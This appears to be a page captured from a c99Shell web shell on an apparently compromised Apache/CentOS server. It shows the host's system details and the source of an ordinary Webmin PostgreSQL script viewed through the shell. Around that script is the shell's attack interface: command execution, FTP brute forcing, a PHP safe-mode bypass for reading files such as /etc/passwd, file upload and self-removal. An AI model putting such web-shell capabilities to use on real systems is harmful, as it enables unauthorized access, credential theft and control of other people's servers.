!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/postgresql/   drwxr-xr-x
Free 49.59 GB of 127.8 GB (38.8%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     edit_field.cgi (2.28 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# edit_field.cgi
# Display a form for editing an existing field or creating a new one

require './postgresql-lib.pl';
&ReadParse();
&can_edit_db($in{'db'}) || &error($text{'dbase_ecannot'});
$desc = &text('field_in', "<tt>$in{'table'}</tt>", "<tt>$in{'db'}</tt>");
if ($in{'type'}) {
    # Creating a new field
    &ui_print_header($desc, $text{'field_title1'}, "", "create_field");
    $type = $in{'type'};
    }
else {
    # Editing an existing field
    &ui_print_header($desc, $text{'field_title2'}, "", "edit_field");
    @desc = &table_structure($in{'db'}, $in{'table'});
    $f = $desc[$in{'idx'}];
    $type = $f->{'type'};
    }

# Start of form block
print &ui_form_start("save_field.cgi", "post");
print &ui_hidden("db", $in{'db'});
print &ui_hidden("table", $in{'table'});
print &ui_hidden("new", $in{'type'});
print &ui_table_start($text{'field_header'}, undef, 2);

# Field name
print &ui_table_row($text{'field_name'},
    &ui_textbox("field", $f->{'field'}, 40));
print &ui_hidden("old", $f->{'field'}) if (!$in{'type'});

# Field type
if ($type =~ /^(\S+)\((.*)\)/) {
    $type = $1;
    $size = $2;
    }
print &ui_table_row($text{'field_type'}, $type);
print &ui_hidden("type", $type);

if ($type eq 'char' || $type eq 'varchar' || $type eq 'numeric' ||
    $type eq 'bit') {
    if ($in{'type'}) {
        # Type has a size
        print &ui_table_row($text{'field_size'},
            &ui_textbox("size", $size, 15));
        }
    else {
        # Type cannot be edited
        print &ui_table_row($text{'field_size'}, $size);
        }
    }

if ($in{'type'}) {
    # Ask if this is an array
    print &ui_table_row($text{'field_arr'},
        &ui_yesno_radio("arr", 0));
    }
else {
    # Display if array or not
    print &ui_table_row($text{'field_arr'},
        $f->{'arr'} eq 'YES' ? $text{'yes'} : $text{'no'});
    }

if (!$in{'type'}) {
    # Display nulls
    print &ui_table_row($text{'field_null'},
        $f->{'null'} eq 'YES' ? $text{'yes'} : $text{'no'});
    }

print &ui_table_end();
if ($in{'type'}) {
    print &ui_form_end([ [ undef, $text{'create'} ] ]);
    }
else {
    print &ui_form_end([ [ undef, $text{'save'} ],
        &can_drop_fields() && @desc > 1 ?
            ( [ 'delete', $text{'delete'} ] ) : ( ) ]);
    }

&ui_print_footer("edit_table.cgi?db=$in{'db'}&table=$in{'table'}",
          $text{'table_return'},
         "edit_dbase.cgi?db=$in{'db'}", $text{'dbase_return'},
         &get_databases_return_link($in{'db'}), $text{'index_return'});


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0141 ]--